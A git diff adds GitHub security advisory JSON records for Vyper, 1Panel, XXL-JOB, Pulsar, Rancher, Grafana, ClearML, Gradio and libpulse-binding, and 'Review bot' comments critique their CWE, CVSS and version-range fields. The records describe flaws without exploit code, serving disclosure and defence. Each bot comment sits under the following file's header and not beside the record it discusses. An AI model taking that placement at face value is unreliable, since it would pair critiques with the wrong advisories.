+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24561"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/vyperlang/vyper/issues/3756"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/vyperlang/vyper"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/vyperlang/vyper/blob/b01cd686aa567b32498fefd76bd96b0597c6f099/vyper/builtins/functions.py#L404-L457"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-01T20:51:32Z",
+ "nvd_published_at": "2024-02-01T17:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-9xfw-jjq2-7v8h/GHSA-9xfw-jjq2-7v8h.json b/advisories/github-reviewed/2024/02/GHSA-9xfw-jjq2-7v8h/GHSA-9xfw-jjq2-7v8h.json
new file mode 100644
index 0000000000000..2a6d872e6e48e
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-9xfw-jjq2-7v8h/GHSA-9xfw-jjq2-7v8h.json
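Review bot: `cwe_ids` lists only `CWE-119`, while the root cause given in `details` is that `start + length` wraps when the operands are not literals, which is CWE-190 (Integer Overflow or Wraparound); the out-of-bounds access is the consequence, not the weakness. Consider `"cwe_ids": ["CWE-119", "CWE-190"]` so consumers filtering by weakness class see both. The range ends in `last_affected: "0.3.10"` with no `fixed` event, which matches the details (the tracking issue was still open at publication), so tooling will report no patched version until the record is revisited.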
@@ -0,0 +1,72 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9xfw-jjq2-7v8h",
+ "modified": "2024-02-05T20:19:30Z",
+ "published": "2024-02-05T20:19:30Z",
+ "aliases": [
+ "CVE-2024-24768"
+ ],
+ "summary": "1Panel set-cookie is missing the Secure keyword",
+ "details": "### Summary\nThe https cookie that comes with the panel does not have the Secure keyword, which may cause the cookie to be sent in plain text when accessing http accidentally.\n\nhttps://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers/Set-Cookie#secure\n\n### PoC\nDirectly configure https for the panel, and then capture the packet when logging in again and find that the cookie does not have the Secure keyword\n\n### Impact\nEveryone who has configured the panel https\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/1Panel-dev/1Panel"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.9.6"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 1.9.5"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-9xfw-jjq2-7v8h"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24768"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/1Panel-dev/1Panel/pull/3817"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/1Panel-dev/1Panel/commit/1169648162c4b9b48e0b4aa508f9dea4d6bc50d5"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/1Panel-dev/1Panel"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-315"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-05T20:19:30Z",
+ "nvd_published_at": "2024-02-05T15:15:09Z"
+ }
+}
\ No newline at end of file
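Review bot: `cwe_ids` is set to `CWE-315`, but the weakness described — a session cookie issued over HTTPS without the `Secure` attribute — is the definition of CWE-614 (Sensitive Cookie in HTTPS Session Without 'Secure' Attribute); CWE-315 is about cleartext storage of sensitive data inside a cookie, which `details` does not claim. Suggest `"cwe_ids": ["CWE-614"]`. The `last_known_affected_version_range` of `<= 1.9.5` agrees with the `fixed: "1.9.6"` event, so the range itself is consistent.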
diff --git a/advisories/github-reviewed/2024/02/GHSA-c352-x843-ggpq/GHSA-c352-x843-ggpq.json b/advisories/github-reviewed/2024/02/GHSA-c352-x843-ggpq/GHSA-c352-x843-ggpq.json
new file mode 100644
index 0000000000000..1f9030d8e3d37
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-c352-x843-ggpq/GHSA-c352-x843-ggpq.json
@@ -0,0 +1,58 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c352-x843-ggpq",
+ "modified": "2024-02-08T18:42:13Z",
+ "published": "2024-02-08T15:30:27Z",
+ "aliases": [
+ "CVE-2024-24113"
+ ],
+ "summary": "XXL-JOB vulnerable to Server-Side Request Forgery",
+ "details": "xxl-job <= 2.4.0 has a Server-Side Request Forgery (SSRF) vulnerability, which causes low-privileged users to control executor to RCE.",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "com.xuxueli:xxl-job"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "2.4.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24113"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/xuxueli/xxl-job/issues/3375"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/xuxueli/xxl-job"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-918"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-08T18:42:13Z",
+ "nvd_published_at": "2024-02-08T13:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-c57v-4vg5-cm2x/GHSA-c57v-4vg5-cm2x.json b/advisories/github-reviewed/2024/02/GHSA-c57v-4vg5-cm2x/GHSA-c57v-4vg5-cm2x.json
new file mode 100644
index 0000000000000..30d6d2a6202b0
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-c57v-4vg5-cm2x/GHSA-c57v-4vg5-cm2x.json
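Review bot: The `severity` array is empty while `database_specific.severity` is `MODERATE`, so nothing in the record backs the qualitative rating, and `details` states that the SSRF lets low-privileged users reach RCE on the executor, an outcome that would ordinarily score above moderate. Either add the CVSS vector the rating was derived from or leave the qualitative severity unset until one is available, so consumers do not treat an unscored record as scored. The range uses `last_affected: "2.4.0"` with no `fixed` event, which is consistent with the details giving only `<= 2.4.0`.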
@@ -0,0 +1,123 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c57v-4vg5-cm2x",
+ "modified": "2024-02-07T18:23:31Z",
+ "published": "2024-02-07T12:30:25Z",
+ "aliases": [
+ "CVE-2023-51437"
+ ],
+ "summary": "Apache Pulsar SASL Authentication Provider observable timing discrepancy vulnerability",
+ "details": "Observable timing discrepancy vulnerability in Apache Pulsar SASL Authentication Provider can allow an attacker to forge a SASL Role Token that will pass signature verification.\nUsers are recommended to upgrade to version 2.11.3, 3.0.2, or 3.1.1 which fixes the issue. Users should also consider updating the configured secret in the `saslJaasServerRoleTokenSignerSecretPath` file.\n\nAny component matching an above version running the SASL Authentication Provider is affected. That includes the Pulsar Broker, Proxy, Websocket Proxy, or Function Worker.\n\n2.11 Pulsar users should upgrade to at least 2.11.3.\n3.0 Pulsar users should upgrade to at least 3.0.2.\n3.1 Pulsar users should upgrade to at least 3.1.1.\nAny users running Pulsar 2.8, 2.9, 2.10, and earlier should upgrade to one of the above patched versions.\n\nFor additional details on this attack vector, please refer to https://codahale.com/a-lesson-in-timing-attacks/ .\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.apache.pulsar:pulsar-broker-auth-sasl"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "2.11.3"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.apache.pulsar:pulsar-broker-auth-sasl"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "3.0.0"
+ },
+ {
+ "fixed": "3.0.2"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.apache.pulsar:pulsar-broker-auth-sasl"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "3.1.0"
+ },
+ {
+ "fixed": "3.1.1"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51437"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/apache/pulsar/pull/21061"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/apache/pulsar/commit/6274fa01a75d74d559bb7e514c970f1fc07d15bc"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/apache/pulsar/commit/bc1019fa8ed37b8a4c8bb01e3662c6c015e1bc27"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/apache/pulsar/commit/c05954e66ff33098aeb848f4bde51613ace7e47e"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/apache/pulsar/commit/c27beca64cc93848c40a374f19eaf4d3cc4f4f03"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/apache/pulsar"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.apache.org/thread/5kgmvvolf5tzp5rz9xjwfg2ncwvqqgl5"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2024/02/07/1"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-200"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-07T18:23:31Z",
+ "nvd_published_at": "2024-02-07T10:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-c85r-fwc7-45vc/GHSA-c85r-fwc7-45vc.json b/advisories/github-reviewed/2024/02/GHSA-c85r-fwc7-45vc/GHSA-c85r-fwc7-45vc.json
new file mode 100644
index 0000000000000..fde062978514e
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-c85r-fwc7-45vc/GHSA-c85r-fwc7-45vc.json
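Review bot: `cwe_ids` carries only `CWE-200`, but the summary and details name an observable timing discrepancy in token signature verification, which is CWE-208 (Observable Timing Discrepancy); CWE-200 is the generic information-exposure parent and does not tell a consumer that the flaw is a non-constant-time comparison. Suggest `"cwe_ids": ["CWE-208"]`, or at least adding it alongside `CWE-200`. The three ranges (`<2.11.3`, `3.0.0`–`3.0.2`, `3.1.0`–`3.1.1`) match the upgrade guidance in `details`, and the details already carry the defender-relevant step of rotating the signer secret after upgrading.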
@@ -0,0 +1,95 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c85r-fwc7-45vc",
+ "modified": "2024-02-08T18:43:28Z",
+ "published": "2024-02-08T18:43:28Z",
+ "aliases": [
+ "CVE-2023-32194"
+ ],
+ "summary": "Rancher permissions on 'namespaces' in any API group grants 'edit' permissions on namespaces in 'core'",
+ "details": "### Impact\nA vulnerability has been identified when granting a `create` or `*` **global role** for a resource type of \"namespaces\"; no matter the API group, the subject will receive `*` permissions for core namespaces. This can lead to someone being capable of accessing, creating, updating, or deleting a namespace in the project. This includes reading or updating a namespace in the project so that it is available in other projects in which the user has the \"manage-namespaces\" permission or updating another namespace in which the user has normal \"update\" permissions to be moved into the project.\n\nThe expected behavior is to not be able to create, update, or delete a namespace in the project or move another namespace into the project since the user doesn't have any permissions on namespaces in the core API group.\n\nMoving a namespace to another project could lead to leakage of secrets, in case the targeted project has secrets. And also can lead to the namespace being able to abuse the resource quotas of the targeted project.\n\n### Patches\nPatched versions include releases `2.6.14`, `2.7.10` and `2.8.2`.\n\n### Workarounds\nThere is no direct mitigation besides updating Rancher to a patched version.\n\n### References\nIf you have any questions or comments about this advisory:\n\n- Reach out to the [SUSE Rancher Security team](https://github.com/rancher/rancher/security/policy) for security-related inquiries.\n- Open an issue in the [Rancher](https://github.com/rancher/rancher/issues/new/choose) repository.\n- Verify with our [support matrix](https://www.suse.com/suse-rancher/support-matrix/all-supported-versions/) and [product support lifecycle](https://www.suse.com/lifecycle/).\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/rancher/rancher"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.6.0"
+ },
+ {
+ "fixed": "2.6.14"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/rancher/rancher"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.7.0"
+ },
+ {
+ "fixed": "2.7.10"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/rancher/rancher"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.8.0"
+ },
+ {
+ "fixed": "2.8.2"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/rancher/rancher/security/advisories/GHSA-c85r-fwc7-45vc"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/rancher/rancher"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-269"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-08T18:43:28Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
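Review bot: All three ranges open at `2.6.0`, which tells range-based tooling that Rancher releases before 2.6.0 are unaffected, yet `details` says nothing about older lines either way, and the other records in this commit use `introduced: "0"` when the lower bound is simply unknown. If 2.5.x and earlier are end-of-life but still carry the bug, the first range should open with `"introduced": "0"`; if they were confirmed unaffected, a sentence saying so in `details` would make the bound defensible. `nvd_published_at: null` next to a CVE alias is plausible at publication time but should be backfilled once NVD publishes.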
diff --git a/advisories/github-reviewed/2024/02/GHSA-cmf4-h3xc-jw8w/GHSA-cmf4-h3xc-jw8w.json b/advisories/github-reviewed/2024/02/GHSA-cmf4-h3xc-jw8w/GHSA-cmf4-h3xc-jw8w.json
new file mode 100644
index 0000000000000..7a8cb281fc904
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-cmf4-h3xc-jw8w/GHSA-cmf4-h3xc-jw8w.json
@@ -0,0 +1,100 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cmf4-h3xc-jw8w",
+ "modified": "2024-02-01T00:16:02Z",
+ "published": "2024-02-01T00:16:02Z",
+ "aliases": [
+ "CVE-2022-21703"
+ ],
+ "summary": "Grafana Cross Site Request Forgery (CSRF)",
+ "details": "Today we are releasing Grafana 8.3.5 and 7.5.15. This patch release includes MEDIUM severity security fix for Cross Site Request Forgery for Grafana.\n\nRelease v.8.3.5, only containing security fixes:\n\n- [Download Grafana 8.3.5](https://grafana.com/grafana/download/8.3.5)\n- [Release notes](https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-3-5/)\n\nRelease v.7.5.15, only containing security fixes:\n\n- [Download Grafana 7.5.15](https://grafana.com/grafana/download/7.5.15)\n- [Release notes](https://grafana.com/docs/grafana/latest/release-notes/release-notes-7-5-15/)\n\n## CSRF ([CVE-2022-21703](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21703))\n\n### Summary\nOn Jan. 18, security researchers [jub0bs](https://twitter.com/jub0bs) and [abrahack](https://twitter.com/theabrahack) contacted Grafana to disclose a CSRF vulnerability which allows anonymous attackers to elevate their privileges by mounting cross-origin attacks against authenticated high-privilege Grafana users (for example, Editors or Admins). \n\nWe believe that this vulnerability is rated at CVSS 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N). \n\n### Impact\nAn attacker can exploit this vulnerability for privilege escalation by tricking an authenticated user into inviting the attacker as a new user with high privileges. \n\n### Affected versions with MEDIUM severity \nAll Grafana >=3.0-beta1 versions are affected by this vulnerability.\n\n### Solutions and mitigations\n\nAll installations after Grafana v3.0-beta1 should be upgraded as soon as possible.\n\nNote that if you are running Grafana behind any reverse proxy, you need to make sure that you are passing the original Host and Origin headers from the client request to Grafana.\n\nIn the case of Apache Server, you need to add `ProxyPreserveHost on` in your proxy [configuration](https://httpd.apache.org/docs/2.4/mod/mod_proxy.html). In case of NGINX, you can need to add `proxy_set_header Host $http_host;` in your [configuration](http://nginx.org/en/docs/http/ngx_http_proxy_module.html).\n\nAppropriate patches have been applied to [Grafana Cloud](https://grafana.com/cloud) and as always, we closely coordinated with all cloud providers licensed to offer Grafana Pro. They have received early notification under embargo and confirmed that their offerings are secure at the time of this announcement. This is applicable to Amazon Managed Grafana.\n\n### Timeline and postmortem\n\nHere is a detailed timeline starting from when we originally learned of the issue. All times in UTC.\n- 2022-01-18 03:00 Issue submitted by external researchers\n- 2022-01-18 17:25 Vulnerability confirmed reproducible \n- 2022-01-19 07:40 CVSS score confirmed 6.8 at maximum and MEDIUM impact\n- 2022-01-19 07:40 Begin mitigation for Grafana Cloud\n- 2022-01-19 17:00 CVE requested \n- 2022-01-19 19:50 GitHub issues CVE-2022-21703\n- 2022-01-21 10:50 PR with fix opened\n- 2022-01-21 14:13 Private release planned for 2022-01-25, and public release planned for 2022-02-01.\n- 2022-01-25 12:00 Private release\n- 2022-02-01 12:00 During the public release process, we realized that private 7.x release was incomplete. Abort public release, send second private release to customers using 7.x\n- 2022-02-08 12:00 Public release\n\n### Acknowledgement\n\nWe would like to thank [jub0bs](https://twitter.com/jub0bs) and [abrahack](https://twitter.com/theabrahack) for responsibly disclosing the vulnerability.\n\n### Reporting security issues\n\nIf you think you have found a security vulnerability, please send a report to security@grafana.com. This address can be used for all of Grafana Labs' open source and commercial products (including, but not limited to Grafana, Grafana Cloud, Grafana Enterprise, and grafana.com). We can accept only vulnerability reports at this address. We would prefer that you encrypt your message to us by using our PGP key. The key fingerprint is\n\nF988 7BEA 027A 049F AE8E 5CAA D125 8932 BE24 C5CA\n\nThe key is available from keyserver.ubuntu.com.\n\n### Security announcements\n\nWe maintain a [security category](https://community.grafana.com/c/support/security-announcements) on our blog, where we will always post a summary, remediation, and mitigation details for any patch containing security fixes.\n\nYou can also subscribe to our [RSS feed](https://grafana.com/tags/security/index.xml).\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/grafana/grafana/pkg/web"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "3.0-beta1"
+ },
+ {
+ "fixed": "7.5.15"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/grafana/grafana/pkg/web"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "8.0.0"
+ },
+ {
+ "fixed": "8.3.5"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/grafana/grafana/security/advisories/GHSA-cmf4-h3xc-jw8w"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21703"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/grafana/grafana/pull/45083"
+ },
+ {
+ "type": "WEB",
+ "url": "https://grafana.com/blog/2022/02/08/grafana-7.5.15-and-8.3.5-released-with-moderate-severity-security-fixes/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2PFW6Q2LXXWTFRTMTRN4ZGADFRQPKJ3D/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36GUEPA5TPSC57DZTPYPBL6T7UPQ2FRH/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HLAQRRGNSO5MYCPAXGPH2OCSHOGHSQMQ/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.netapp.com/advisory/ntap-20220303-0005/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-01T00:16:02Z",
+ "nvd_published_at": "2022-02-08T21:15:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-cpcw-9h9m-wqw9/GHSA-cpcw-9h9m-wqw9.json b/advisories/github-reviewed/2024/02/GHSA-cpcw-9h9m-wqw9/GHSA-cpcw-9h9m-wqw9.json
new file mode 100644
index 0000000000000..9b3508163a54a
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-cpcw-9h9m-wqw9/GHSA-cpcw-9h9m-wqw9.json
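Review bot: The vector recorded under `severity`, `CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N`, differs from the one the vendor states inside `details`, `CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N` (6.8), on four metrics (AC, PR, S, I). One is presumably the NVD assessment and the other Grafana's, but the record does not say which was chosen or why, so a consumer comparing the two fields sees a contradiction within a single advisory. Either name the source of the recorded vector or align it with the vendor's; both vectors appear to land in the MODERATE band, so the `database_specific.severity` label is unaffected either way.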
@@ -0,0 +1,61 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cpcw-9h9m-wqw9",
+ "modified": "2024-02-06T20:28:52Z",
+ "published": "2024-02-06T15:32:06Z",
+ "aliases": [
+ "CVE-2024-24590"
+ ],
+ "summary": "Allegro AI ClearML vulnerable to deserialization of untrusted data",
+ "details": "Deserialization of untrusted data can occur in version 0.17.0 or newer of Allegro AI’s ClearML platform, enabling a maliciously uploaded artifact to run arbitrary code on an end user’s system when interacted with.\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "clearml"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0.17.0"
+ },
+ {
+ "last_affected": "1.14.1"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24590"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/allegroai/clearml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-502"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-06T20:28:52Z",
+ "nvd_published_at": "2024-02-06T15:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-f3h9-8phc-6gvh/GHSA-f3h9-8phc-6gvh.json b/advisories/github-reviewed/2024/02/GHSA-f3h9-8phc-6gvh/GHSA-f3h9-8phc-6gvh.json
new file mode 100644
index 0000000000000..3620a66eef1c6
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-f3h9-8phc-6gvh/GHSA-f3h9-8phc-6gvh.json
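Review bot: The only upper bound on the range is `last_affected: "1.14.1"` with no `fixed` event, while `details` says every version from 0.17.0 onward is affected and none of the `references` points at a fix. Range-based tooling will therefore treat 1.14.2 and later as unaffected purely because they had not been released when the record was written, which is the opposite of what the description implies. If no patched release exists, the record needs to be revisited on each release until a `fixed` event can replace `last_affected`; if a fix has shipped, it should be recorded here along with a reference to it.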
@@ -0,0 +1,65 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-f3h9-8phc-6gvh",
+ "modified": "2024-02-06T20:25:41Z",
+ "published": "2024-02-06T00:30:28Z",
+ "aliases": [
+ "CVE-2024-0964"
+ ],
+ "summary": "Gradio Path Traversal vulnerability",
+ "details": "A local file include could be remotely triggered in Gradio due to a vulnerable user-supplied JSON value in an API request.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "gradio"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "4.9.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0964"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/gradio-app/gradio/commit/d76bcaaaf0734aaf49a680f94ea9d4d22a602e70"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/gradio-app/gradio"
+ },
+ {
+ "type": "WEB",
+ "url": "https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-06T20:25:41Z",
+ "nvd_published_at": "2024-02-05T23:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-f56g-chqp-22m9/GHSA-f56g-chqp-22m9.json b/advisories/github-reviewed/2024/02/GHSA-f56g-chqp-22m9/GHSA-f56g-chqp-22m9.json
new file mode 100644
index 0000000000000..c00bad4ec564b
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-f56g-chqp-22m9/GHSA-f56g-chqp-22m9.json
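Review bot: The score string uses the `CVSS:3.0` prefix while every other record in this commit is `CVSS:3.1`, which makes grouping and comparison across records awkward even though the metric names and values are the same in both versions. If the source (huntr or NVD) supplies a 3.0 vector, keeping it is defensible but worth a note; otherwise `"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"` matches the rest of the batch. Separately, `summary` says path traversal while `details` says local file include — both fit `CWE-22`, but using one term in both fields would avoid a reader wondering whether two different issues are meant.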
@@ -0,0 +1,58 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-f56g-chqp-22m9",
+ "modified": "2024-02-03T00:28:45Z",
+ "published": "2024-02-03T00:28:45Z",
+ "aliases": [
+
+ ],
+ "summary": "Use after free in libpulse-binding",
+ "details": "### Overview\n\nVersion 2.5.0 of the `libpulse-binding` Rust crate, released on the 22nd of December 2018, fixed a potential use-after-free issue with property list iteration due to a lack of a lifetime constraint tying the lifetime of a `proplist::Iterator` to the `Proplist` object for which it was created. This made it possible for users, without experiencing a compiler error/warning, to destroy the `Proplist` object before the iterator, thus destroying the underlying C object the iterator works upon, before the iterator may be finished with it.\n\nThis advisory is being written retrospectively, having previously only been noted in the changelog. No CVE assignment was sought.\n\nThis impacts all versions of the crate before 2.5.0 back to 1.0.5. Before version 1.0.5 the function that produces the iterator was broken to the point of being useless.\n\n### Patches\n\nUsers are required to update to version 2.5.0 or newer.\n\nVersions older than 2.5.0 have been yanked from crates.io as of the 22nd of October 2020.",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "crates.io",
+ "name": "libpulse-binding"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "1.0.5"
+ },
+ {
+ "fixed": "2.5.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/jnqnfe/pulse-binding-rust/security/advisories/GHSA-f56g-chqp-22m9"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/jnqnfe/pulse-binding-rust/commit/9e31c82d71749619387cb9d0c9698134d05b28c9"
+ },
+ {
+ "type": "WEB",
+ "url": "https://rustsec.org/advisories/RUSTSEC-2018-0020.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-416"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-03T00:28:45Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
